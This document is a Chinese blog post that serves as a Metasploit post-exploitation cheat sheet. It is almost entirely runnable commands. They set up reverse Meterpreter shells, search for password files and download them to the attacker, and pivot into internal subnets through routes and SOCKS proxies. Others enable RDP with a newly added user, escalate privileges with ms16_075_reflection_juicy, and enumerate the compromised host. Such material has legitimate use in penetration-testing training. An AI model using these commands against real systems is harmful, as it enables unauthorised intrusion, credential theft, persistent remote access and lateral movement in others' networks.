MSF
msf中使用 exploit监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
常见Payload
windows/meterpreter/bind_tcp
#正向连接 这是一个基于TCP的正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST
windows/meterpreter/reverse_http
#通过监听80端口反向连接 基于http方式的反向连接,在网速慢的情况下不稳定
windows/meterpreter/reverse_https
#通过监听443端口反向连接 基于https方式的反向连接,在网速慢的情况下不稳定
常用系统命令
sessions #sessions –h 查看帮助
sessions -i <ID值> #进入会话 -k 杀死会话
background #将当前会话放置后台
run #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程 kill <PID值> 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown #重启/关机
shell #进入目标机cmd shell
基本文件类
基本文件系统命令
getwd 或者pwd # 查看当前工作目录
ls
cd
search -f *pass* # 搜索文件 -h查看帮助
cat c:\\lltest\\lltestpasswd.txt # 查看文件内容
upload /tmp/hack.txt C:\\lltest # 上传文件到目标机上
download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上
edit c:\\1.txt #编辑或创建文件 没有的话,会新建文件
rm C:\\lltest\\hack.txt
mkdir lltest2 #只能在当前目录下创建文件夹
rmdir lltest2 #只能删除当前目录下文件夹
getlwd 或者 lpwd #操作攻击者主机 查看当前目录
lcd /tmp #操作攻击者主机 切换目录
网络类命令
ipconfig/ifconfig
netstat –ano
arp
getproxy #查看代理信息
route #查看路由
portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
run post/multi/manage/autoroute #自动添加路由
setg Proxies socks4/5:ip:port #让msf所有模块的流量都通过此代理走。(setg全局设置)
setg Proxies socks5://user:pass@127.0.0.1:1080
setg Proxies socks5:211.159.173.202:49999
set ReverseAllowProxy true
#允许反向代理,通过socks反弹shell,建立双向通道。(探测可以不设置此项)
autoroute添加完路由后,还可以利用msf自带的sock4a模块进行Socks4a代理
msf> use auxiliary/server/socks4a
msf > set srvhost 127.0.0.1
msf > set srvport 1080
msf > run然后vi /etc/proxychains.conf #添加 socks4 127.0.0.1 1080
最后proxychains 使用Socks4a代理访
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 #扫描192.168.1.0/24这个网段
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.1.144 PORTS=3389 #检测192.168.1.144是否开启338
RDP
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
1.3.6.1 post提权
background
use post/multi/recon/local_exploit_suggester (全自动:快速识别系统中可能被利用的漏洞)
set showdescription true
set session 1
run
然后使用post检测出来的模块进行提权即可
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
set lhost 0.0.0.0
set lport 4444
run
post信息收集
获取目标机器的分区情况
run post/windows/gather/forensics/enum_drives
判断目标机是否为虚拟机:
run post/windows/gather/checkvm
查看目标机开启哪些服务
run post/windows/gather/enum_services
查看目标主机安装了哪些应用、补丁
run post/windows/gather/enum_applications
查看目标机最近的操作
run post/windows/gather/dumplinks
作者:qianyuzz
出处:https://www.cnblogs.com/qianyuzz/p/17735481.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)